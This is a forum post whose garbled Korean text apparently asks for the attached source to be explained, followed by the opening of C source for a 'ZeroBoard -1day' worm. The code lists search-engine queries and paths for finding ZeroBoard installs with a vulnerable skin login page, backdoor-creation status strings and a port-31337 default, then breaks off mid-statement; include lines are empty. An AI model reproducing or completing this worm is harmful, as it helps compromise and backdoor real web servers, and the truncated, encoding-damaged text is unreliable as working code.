¿©±â°í¼öºÐµé.. À̼ҽº Çؼ®Á» ºÎŹµå·Á¿©...
(ÁÖ¼®À»´Þ¾Æ¼...)
¼Ò½º´Â ¾Æ·¡¼ºÎÅͽÃÀÛÇÕ´Ï´Ù...
_______________________________________________________________________________
/*
** ZeroBoard -1day INE w0rm
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef __sun__
#include
#endif /* __SunOS__ */
#define DEBUG_ING
#undef DEBUG_ING
#define TMP_FILE "./tmp.core"
#define CMD_FILE "./cmd.core"
#define PRC_FILE "./proc.core"
#define SCS (0)
#define MIN (1)
#ifdef __linux__
#define DEF_ETH "eth0"
#else
#ifdef __FreeBSD__
#define DEF_ETH "ed0"
#else
#ifdef __sun__
#define DEF_ETH "hme0"
#endif
#endif
#endif
#define MAX_BUF (0x0000ffff)
#define FIR_BUF (0x00000800)
#define SEC_BUF (0x00000400)
#define THR_BUF (0x00000200)
#define MIN_BUF (0x00000100)
#define VENDOR "nzeo.com"
// search rule
#define FD_RULE_0 "/zboard/zboard.php"
#define FD_RULE_1 "/zb41/zboard.php"
#define FD_RULE_2 "/bbs/zboard.php"
#define FD_RULE_3 "/zb/zboard.php"
#define FD_RULE_4 "/zb40/zboard.php"
#define FD_RULE_5 "/board/zboard.php"
#define FD_RULE_6 "zboard.php"
#define FD_RULE_7 "zboard.ph"
// pattern
#define FD_PATH_0 "/zboard/skin/zero_vote/login.php"
#define FD_PATH_1 "/zb41/skin/zero_vote/login.php"
#define FD_PATH_2 "/bbs/skin/zero_vote/login.php"
#define FD_PATH_3 "/zb/skin/zero_vote/login.php"
#define FD_PATH_4 "/zb40/skin/zero_vote/login.php"
#define FD_PATH_5 "/board/skin/zero_vote/login.php"
#define FD_PATH_6 "/skin/zero_vote/login.php"
#define RESULT_OK "200 OK"
#define MAKE_STR1 "BACKDOOR MAKE SUCCESS"
#define MAKE_STR2 "ZBCODE MAKE SUCCESS"
#define DELT_STR1 "BACKDOOR DELETE SUCCESS"
#define DELT_STR2 "ZBCODE DELETE SUCCESS"
#define DEF_PORT (31337)
#define CONN_PORT (80)
#define DEF_TIME (20)
int set_sock(char *sc_gt_host,int port,int type);
void re_connt_lm(int st_sock_va,int type);
int proc_r();
void t_kill();
void sf_exit();
int g_ip(char *ip);
int make_cmd_file();
int filter_f(char *test_bf,int tnum);
int sock;
struct tg_rl
{
int r_num;
char *r_str;
char *url_str;
};
#define TARGET_NUM (7)
#define SEARCH_NUM (4)
struct tg_rl __tg_rule_va[]=
{
{0,FD_RULE_0,FD_PATH_0},
{1,FD_RULE_1,FD_PATH_1},
{2,FD_RULE_2,FD_PATH_2},
{3,FD_RULE_3,FD_PATH_3},
{4,FD_RULE_4,FD_PATH_4},
{5,FD_RULE_5,FD_PATH_5},
{6,FD_RULE_6,FD_PATH_6},
{7,FD_RULE_7,FD_PATH_6},
{8,NULL,NULL}
};
struct search_rule
{
int num;
u_char *url;
int maxnum;
int defnum;
u_char *http_head;
};
struct search_rule search_va[]=
{
{0,"www.google.com",990,10,"http://"},
{1,"kr.search.yahoo.com",990,15,"http://"},
{2,"search.nate.com",480,10,"http://"},
{3,"search.lycos.com",990,10,"//"},
{4,"kr.altavista.com",1000,10,"//"},
{5,NULL,0,0,NULL}
};
void t_kill()
{
#ifdef DEBUG_ING
fprintf(stdout,"time outn");
#endif
close(sock);
sock=-1;
signal(SIGALRM,SIG_DFL);
return;
}
void sf_exit()
{
#ifdef DEBUG_ING
fprintf(stdout,"safe exitn");
#endif
close(sock);
kill((int)proc_r(),9);
unlink(TMP_FILE);
unlink(CMD_FILE);
unlink(PRC_FILE);
exit(-1);
}
int main(int argc,char *argv[])
{
FILE *fp;
int tnum=(SCS);
int chk=(SCS);
int gogo=(SCS);
int whgl=(SCS);
int qnum=(SCS);
int tgrl_sl=(MIN);
int _conn_num=(SCS);
int port=(CONN_PORT);
int def_port=(DEF_PORT);
int sc_gt_sock;
int host_chk=(SCS);
u_char *gg_ptr=NULL;
u_char *t_ptr=NULL;
u_char __zr_bf[(MAX_BUF)];
u_char *port_ptr=NULL;
char pkt[(FIR_BUF)];
char host[(SEC_BUF)];
char url[(SEC_BUF)];
char test_bf[(MAX_BUF)];
char req_t_bf[(THR_BUF)];
char ip[(MIN_BUF)];
char atk_code[(MIN_BUF)];
signal(SIGINT,sf_exit);
signal(SIGTSTP,sf_exit);
while((whgl=getopt(argc,argv,"S:s:T:t:Q:q:P:p:H:h:U:u:"))!=EOF)
{
extern char *optarg;
switch(whgl)
{
case 'S':
case 's':
tnum=atoi(optarg);
if(SEARCH_NUM
|
3206, 
6/161 
